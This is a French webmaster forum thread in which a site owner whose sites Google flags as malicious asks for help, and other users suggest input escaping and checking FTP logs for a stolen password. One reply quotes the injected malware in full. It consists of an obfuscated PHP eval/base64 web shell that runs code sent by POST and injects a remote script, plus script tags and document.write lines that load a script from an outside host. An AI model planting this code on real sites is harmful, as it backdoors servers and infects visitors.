Sécurité des sites?

[refmaurice]

Bonjour tt le monde,

Mon problème est le suivant: mes sites web sont toujours déclarés chez Google " Site Malveillant" sachant que je refaits chaque jour les accées FTP de tous les sites et j'ai bien sécurisé les formulaires avec la fonction PHP "string strip_tags ( string $str [, string $allowable_tags ] )".

Alors je supprime les codes malveillants de toutes les pages et ça me prend beaucoup de temps surtout avec des sites qui contiennent beaucoup de pages. J'envoie après le nettoyage des pages un sitemap a Google et j'attends la réponse. Le problème c'est de savoir la ressource des attaques successives et comment se protéger contre ces hakers

Il y a des gens qui m'ont dit que peut être j'ai un fichier caché inclus dans un fichier image ou autre d'où je suis toujours attaqué

Est ce que ça peut être le cas?

J'ai besoin de vos conseils SVP.

Merci d'avance.

[Vontage]

Utilises plutôt htmlspecialchars pour les données à afficher sur une page web, et mysql_real_escape_string pour la bdd.

[Patrick]

Salut,

tu pourrais nous en dire plus sur ton hébergement ? (hébergeur, type de serveur, OS, etc.)

Nous donner l'url du (des) site hacké ?

++

Patrick

[refmaurice]

Bonjour,

Merci pour vos conseils.

Voici un exemple des codes malveillants que je les trouve toujours sur les sites:

Exemple1:

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnZDM2MCcpKXtmdW5jdGlvbiBkMzYwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKGNvdW50KGV4cGxvZGUoIlxuIiwkdikpPjUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYpfHxwcmVnX21hdGNoKCcjW1woXFtdKFxzKlxkKywpezIwLH0jJywkdik7aWYoKHByZWdfbWF0Y2goJyNcYmV2YWxcYiMnLCR2KSYmKCRlfHxzdHJwb3MoJHYsJ2Zyb21DaGFyQ29kZScpKSl8fCgkZSYmc3RycG9zKCR2LCdkb2N1bWVudC53cml0ZScpKSkkcz1zdHJfcmVwbGFjZSgkdiwnJywkcyk7fWlmKHByZWdfbWF0Y2hfYWxsKCcjPGlmcmFtZSAoW14+XSo/KXNyYz1bXCciXT8oaHR0cDopPy8vKFtePl0qPyk+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYocHJlZ19tYXRjaCgnI1tcLiBdd2lkdGhccyo9XHMqW1wnIl0/MCpbMC05XVtcJyI+IF18ZGlzcGxheVxzKjpccypub25lI2knLCR2KSYmIXN0cnN0cigkdiwnPycuJz4nKSkkcz1wcmVnX3JlcGxhY2UoJyMnLnByZWdfcXVvdGUoJHYsJyMnKS4nLio/PC9pZnJhbWU+I2lzJywnJywkcyk7JHM9c3RyX3JlcGxhY2UoJGE9YmFzZTY0X2RlY29kZSgnUEhOamNtbHdkQ0J6Y21NOWFIUjBjRG92TDNOeWNITnJhV1JsYzNCdmRDNXZjbWN1Y25NdmMzUmhkSE12YzJ4cGEyVlRkSEpoYm1FekxuQm9jQ0ErUEM5elkzSnBjSFErJyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKCRzLCc8YScpKSRzPSRhLiRzO3JldHVybiRzO31mdW5jdGlvbiBkMzYwMigkYSwkYiwkYywkZCl7Z2xvYmFsJGQzNjAxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRkMzYwMSkpY2FsbF91c2VyX2Z1bmMoJGQzNjAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdkMzYwJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnZDM2MCcpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRkMzYwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZDM2MDInKSkhPSdkMzYwMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); ?>

Exemple2:

<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ></script>

Exemple 3:

document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');
document.write('<script src=http://srpskidespot.org.rs/stats/slikeStrana3.php ><\/script>');

Exemple 4:

<edit: supprimé par Dan, un code aussi long n'apporte rien !>

Et le virus que j'ai sur ma machine s'appelle : Worm MyTob.TL

J'attends votre aide SVP.

A bientôt!

[Dan]

Regarde les logs d'accès FTP, tu as probablement dû te faire hacker un mot de passe.

C'est relativement facile pour ceux qui utilisent les anciennes versions de Filezilla et/ou n'ont pas d'antivirus à jour !

Si tu as ce virus sur ton ordi, qu'est-ce-que tu attends pour l'éradiquer ?

[refmaurice]

Bonjour,

Merci pour vos réponses.

A bientôt!